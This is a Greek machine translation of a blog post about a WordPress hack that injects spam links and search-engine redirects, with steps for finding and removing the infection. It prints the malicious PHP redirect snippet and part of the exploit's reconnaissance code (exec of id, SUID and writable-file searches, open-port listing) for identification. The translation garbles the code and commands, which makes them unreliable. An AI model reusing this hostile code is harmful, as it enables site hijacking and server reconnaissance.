Blogosphere ιός ... αλλά τι έκανες για μένα;

Τον τελευταίο μήνα, έχω λάβει προειδοποιήσεις του ιού στο blog από κάποιους επισκέπτες. Αρχικά αγνόησε τις προειδοποιήσεις, επειδή έχω εγκαταστήσει ένα αρκετά καλό antivirus (Kaspersky AV 2009) Και ακόμη blog για μεγάλο χρονικό διάστημα, ποτέ δεν έλαβε ειδοποίηση του ιού (εδώ και πολύ καιρό .. Είδα κάτι ύποπτο ότι η πρώτη ανανέωση εξαφανίστηκε. Τέλος ...).
Σιγά-σιγά άρχισαν να παρουσιάζουν μεγάλες διακυμάνσεις επισκεψιμότηταςΜετά την οποία πρόσφατα μειώθηκε σταθερά κυκλοφορίας και άρχισαν να είναι όλο και περισσότεροι άνθρωποι μου λένε ότι stealthsettings.com είναι virused. Χθες έλαβα από κάποιον ένα screenshot γίνεται όταν μπλοκάρει ένα antivirus γραφή για stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Ήταν αρκετά πειστική για μένα, έτσι έβαλα όλες τις πηγές αναζήτηση. Η πρώτη ιδέα που μου ήρθε στο μυαλό ήταν να κάνει αναβάθμισης η τελευταία WordPress (2.5.1), αλλά όχι πριν από το παλιό σενάριο για να διαγράψετε όλα τα αρχεία του WordPress και να βάση δεδομένων αντιγράφων ασφαλείας. Η διαδικασία αυτή ηττήθηκε και κατά πάσα πιθανότητα δεν θα έχουν χρόνο για να δώσει SEMA πληγή μου, όπου, αν θα έλεγα σε μια συζήτηση πέρα ​​από τον καφέ, βρήκε Google και θα ήταν καλό να τον δω.
MyDigitalLife.info, δημοσίευσε ένα άρθρο με τίτλο: "WordPress Hack: Ανάκτηση και Fix Google και Search Engine ή μηδενική κυκλοφορία Cookie κατευθυνθούν προς Needs.info σας, AnyResults.Net, Golden-Info.net και άλλων παράνομων τοποθεσίες"Αυτό είναι το τέλος του νήματος που χρειαζόμουν.
Πρόκειται για μια εκμεταλλεύονται WordPress με βάση μπισκότοΤο οποίο πιστεύω ότι είναι πολύ περίπλοκο και έκανε το βιβλίο. Clever αρκετό για να κάνει μια SQL Injection Βάση δεδομένων blog, για να δημιουργήσετε ένα αόρατο χρήστη ένας απλός έλεγχος ρουτίνας Πίνακας όργανων->χρήστες, ελέγξτε τους καταλόγους του διακομιστή και τα αρχεία "εγγράψιμος" (Με 777 chmod), να αναζητήσουν και να εκτελέσει αρχεία με τα προνόμια της ομάδας ή τη ρίζα. Δεν ξέρω που εκμεταλλεύονται το όνομα και να δούμε ότι υπάρχουν λίγα άρθρα που έχουν γραφτεί γι 'αυτόν, παρά το γεγονός ότι πολλά blogs έχουν μολυνθεί, συμπεριλαμβανομένης της Ρουμανίας. Εντάξει ... Θα προσπαθήσω να προσπαθήσω να εξηγήσω γενικότητες σχετικά με τον ιό.

Τι είναι ιός;

Κατ 'αρχάς, τοποθετήστε τις σελίδες πηγές σχετικά με τα blogs, συνδέσεις αόρατα στους επισκέπτες, αλλά ορατό και δεικτοποιημένων για τις μηχανές αναζήτησης, κυρίως Google. Με τον τρόπο αυτό Σειρά τόπους μεταφοράς Page υποδεικνύεται από τον εισβολέα. Δεύτερον, εισάγεται κώδικα ανακατεύθυνσης URL για τους επισκέπτες που έρχονται από το Google, Live, Yahoo, ... ή ένα RSS reader και όχι η θέση σε κουλουράκι. ένα προστασίας από ιούς ανιχνεύει την ανακατεύθυνση ως Trojan-Clicker.HTML.

Συμπτώματα:

Μειώθηκε μαζική κίνηση των επισκεπτώνΕιδικά για τα blogs, όπου οι περισσότεροι επισκέπτες έρχονται από το Google.

Αναγνώριση: (Εξ ου και περιπλέκουν το πρόβλημα για εκείνους που δεν ξέρουν πώς να το πώς phpmyadmin, php και linux)

LA. ΠΡΟΣΟΧΗ! Πρώτα κάνει ένα αντίγραφο ασφαλείας της βάσης δεδομένων!

1. Ελέγξτε τα αρχεία προέλευσης index.php, header.php, footer.php, Το θέμα του blog και να δούμε αν υπάρχει ένας κωδικός που χρησιμοποιεί κρυπτογράφηση base64 ή περιέχει "αν ($ ser ==" 1 && sizeof ($ _COOKIE) == 0?) "μορφή:

<? Php
Seref $ = array ("google", "msn", "ζουν", "altavista"
"Ρωτήστε", "Yahoo", "AOL", "CNN", "καιρός", "alexa")?
$ Ser = 0? Foreach ($ $ Σερέφ ως ref)
αν (strpos (strtolower
! ($ _SERVER ['HTTP_REFERER']), $ ref) == False) {; $ ser = "1, Break?}
if ($ ser == "1 && sizeof ($ _COOKIE) == 0;) {header (" Τοποθεσία: ". base64_decode (" ")." http:// YW55cmVzdWx0cy5uZXQ = / ")? εξόδου?
}>

Ή ... κάτι. Διαγράψτε τον κωδικό αυτό!

Κάντε κλικ στην εικόνα ...

δείκτη κωδικό

Στην παραπάνω εικόνα έχω επιλέξει κατά λάθος το "<Php get_header ()?;>". Ο κώδικας θα πρέπει να παραμείνει.

2. Χρήση phpMyAdmin και πηγαίνετε στο πίνακα της βάσης δεδομένων wp_usersΌταν ελέγξτε αν δεν υπάρχει το όνομα χρήστη που δημιουργήθηκε στις 00:00:00 0000-00-00 (Πιθανές στον τομέα user_login γράψετε "WordPress". Σημειώστε το όνομα χρήστη (ID τομέα) και στη συνέχεια, διαγράψτε το.

Κάντε κλικ στην εικόνα ...

ψεύτικο χρήστη

* Η πράσινη γραμμή θα πρέπει να αφαιρεθεί και να διατηρήσει την ταυτότητά του. Στην περίπτωση του Ήταν ID = 8 .

3. Πηγαίνετε στον πίνακα wp_usermeta, Όταν σας βρίσκεται και διαγράψετε γραμμές για την ταυτότητα (όπου το πεδίο user_id ID αξία αφαιρείται).

4. Στον Πίνακα wp_option, Go active_plugins και να δούμε τι plugin είναι ενεργοποιημένη ύποπτος. Μπορεί να χρησιμοποιηθεί σαν καταλήξεις _old.giff, _old.pngg, _old.jpeg, _new.php.giffΚλπ συνδυασμούς επεκτάσεις με _OLD και _New ψεύτικες εικόνα.

ΠΟΥ SELECT * FROM wp_options option_name = "active_plugins»

Διαγράψτε αυτό το plugin, τότε πηγαίνετε στο blog -> Πίνακας -> Plugins, και να ενεργοποιήσετε ένα plugin το οποίο να απενεργοποιήσετε ορισμένες.

Κάντε κλικ στην εικόνα για να δείτε φαίνεται active_plugins αρχείο του ιού.

συνδέω

Ακολουθήστε το μονοπάτι για το FTP ή SSH, που αναφέρεται στο active_plugins και να διαγράψετε το αρχείο από το διακομιστή.

5. Επίσης στην phpMyAdmin, στον Πίνακα wp_option, Βρείτε και διαγράψτε τη γραμμή που περιέχει "rss_f541b3abd05e7962fcab37737f40fad8«Και»internal_links_cache ".
Σε internal_links_cache, προσφέρονται κρυπτογραφημένα συνδέσεις spam που εμφανίζονται σε ένα blog Google Adsense κώδικα, Ο χάκερ.

6. Είναι συνιστάται να αλλάξετε τον κωδικό πρόσβασης Blog και σύνδεσης αφαιρέστε όλες τις ύποπτες userele. Αναβάθμιση στην τελευταία έκδοση του WordPress και το blog που να μην επιτρέπουν την εγγραφή των νέων χρηστών. Δεν υπάρχει καμία απώλεια ... μπορεί να σχολιάσει και παράλογο.

Προσπάθησα να εξηγήσω παραπάνω περισσότερο ή λιγότερο, τι πρέπει να κάνουμε σε μια τέτοια περίπτωση, για να καθαρίσετε το blog του ιού. Το πρόβλημα είναι πιο σοβαρό από ό, τι φαίνεται και πουθενά κοντά λυθεί, για χρήση τρωτά σημεία της ασφάλειας φιλοξενεί τον web server, το οποίο είναι το blog.

Ως πρώτο μέτρο ασφαλείας, με πρόσβαση SSH, Κάντε ορισμένους ελέγχους στο διακομιστή για να δείτε αν υπάρχουν αρχεία όπως * _OLD * και * _New. * Με καταλήξεις.GIFF,. jpeg,. pngg,. jpgg. Αυτά τα αρχεία θα πρέπει να διαγράφονται. Εάν μετονομάσετε ένα αρχείο, για παράδειγμα. top_right_old.giff in top_right_old.phpΒλέπουμε ότι το αρχείο είναι ακριβώς ο server κώδικα εκμεταλλεύονται.

Μερικές χρήσιμες ενδείξεις για τον έλεγχο, τον καθαρισμό και την ασφάλεια του διακομιστή. (Μέσω SSH)

1. cd / tmp και ελέγξτε αν υπάρχουν φάκελοι, όπως tmpVFlma ή οποιαδήποτε άλλη ονομασία asemenatoare συνδυασμούς και να το διαγράψετε. Δείτε το παρακάτω στιγμιότυπο, δύο τέτοια φακέλους για μένα:

tmpserver

rm-rf όνομα_φακέλου

2. Ελέγξτε elimiati (αλλαγή chmod-mail) τους φακέλους με χαρακτηριστικά όσο το δυνατόν chmod 777

βρείτε όλα τα εγγράψιμα αρχεία στην τρέχουσα dir: Εύρεση. -Type f-perm-2-ls
βρείτε όλα τα εγγράψιμο καταλόγους στην τρέχουσα dir: Εύρεση. Τύπος-d-περμανάντ-2-ls
βρείτε όλα τα εγγράψιμο καταλόγους και τα αρχεία στην τρέχουσα dir: Εύρεση. -Perm-2-ls

3. Ψάχνετε για ύποπτα αρχεία στον server.

Εύρεση. -Όνομα "* _new.php *"
Εύρεση. -Όνομα "* _old.php *"
Εύρεση. -Όνομα "*. Jpgg"
Εύρεση. -Όνομα "* _giff"
Εύρεση. -Όνομα "* _pngg"

4, ΠΡΟΣΟΧΗ! τα αρχεία που έχουν θέσει λίγο SUID si SGID. Αυτά τα αρχεία εκτελούν με τα προνόμια του χρήστη (ομάδα) ή ρίζα, όχι ο χρήστης που εκτελεί το αρχείο. Αυτά τα αρχεία μπορούν να οδηγήσουν σε συμβιβασμό ρίζα, αν τα θέματα ασφάλειας. Εάν δεν χρησιμοποιήσετε τα SUID και SGID αρχεία με λίγο, εκτελεί »chmod 0 " τους ή να καταργήσετε την εγκατάσταση του πακέτου που περιέχει τους.

Εκμεταλλευτείτε περιέχει κάπου στην πηγή ...:

if (! $ safe_mode) {
if ($ os_type == 'nix') {
$ Os = Εκτέλεση («sysctl-n kern.ostype»).?
$ Os = Εκτέλεση («sysctl-n kern.osrelease»).?
$ Os = Εκτέλεση («sysctl-n kernel.ostype»).?
$ Os = Εκτέλεση («sysctl-n kernel.osrelease»).?
if (empty ($ χρήστης)) = $ χρήστης εκτελέσει ("id")?
Ψευδώνυμα $ = array (
"=>"
"Βρείτε τα αρχεία suid '=>' find /-type f-perm-04000-ls»,
«Βρείτε τα αρχεία SGID '=>' find /-type f-perm-02000-ls»,
«Βρείτε όλα τα εγγράψιμα αρχεία στην τρέχουσα dir '=>' βρει. -Type f-perm-2-ls »,
«Βρείτε όλα τα εγγράψιμο καταλόγους στην τρέχουσα dir '=>' βρει. Τύπος-d-περμανάντ-2-ls »,
«Βρείτε όλα τα εγγράψιμο καταλόγους και τα αρχεία στην τρέχουσα dir '=>' βρει. -Perm-2-ls »,
»Εμφάνιση ανοίξει λιμάνια '=>' netstat-an | grep-i ακούνε»,
);
Else {}
. $ Os_name = Εκτέλεση (ver »)?
Χρήστης $ = Εκτέλεση («echo% username%).?
Ψευδώνυμα $ = array (
"=>"
"Εμφάνιση runing υπηρεσίες '=>' net start»
»Εμφάνιση λίστας διαδικασία '=>' tasklist»
);
}

Βρίσκει αυτόν τον τρόπο ... βασικά παραβιάσεις της ασφάλειας. Λιμάνια άνοιγμα του καταλόγου "εγγράψιμος" και η ομάδα προνόμια εκτέλεση αρχείων / root.

Επιστροφή με περισσότερα ...

Ορισμένα blogs έχουν μολυνθεί: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /,

www.mirabilismedia.ro / blog, Blog.einvest.ro
... Ο κατάλογος συνεχίζεται ... πολλά.

Μπορείτε να ελέγξετε αν ένας ιός είναι το blog, χρησιμοποιώντας το Google μηχανή αναζήτησης. copy & paste:

Ιστοσελίδα: buy www.blegoo.com

Καληνύχτα και αύξηση στην εργασία ;) Σύντομα θα έρθω να σε Eugene ειδήσεις prevezibil.imprevizibil.com.

brb :)

ΠΡΟΣ: ΠΡΟΣΟΧΗ! WordPress θέμα την αλλαγή ή αναβάθμιση σε WordPress 2.5.1, δεν είναι μια λύση για να απαλλαγούμε από αυτόν τον ιό.

Blogosphere ιός ... αλλά τι έκανες για μένα;

Σχετικά με τον Συγγραφέα

Λαθραία

Πάθος για ό, τι το gadget και να το γράψετε με χαρά stealthsettings.com των 2006 και μου αρέσει να ανακαλύψει νέα πράγματα μαζί σας σχετικά με τους υπολογιστές και το MacOS, Linux, Windows, iOS και Android.

Αφήστε ένα σχόλιο

Αυτός ο ιστότοπος χρησιμοποιεί το Akismet για να μειώσει το spam. Μάθετε πώς επεξεργάζονται τα δεδομένα των σχολίων σας.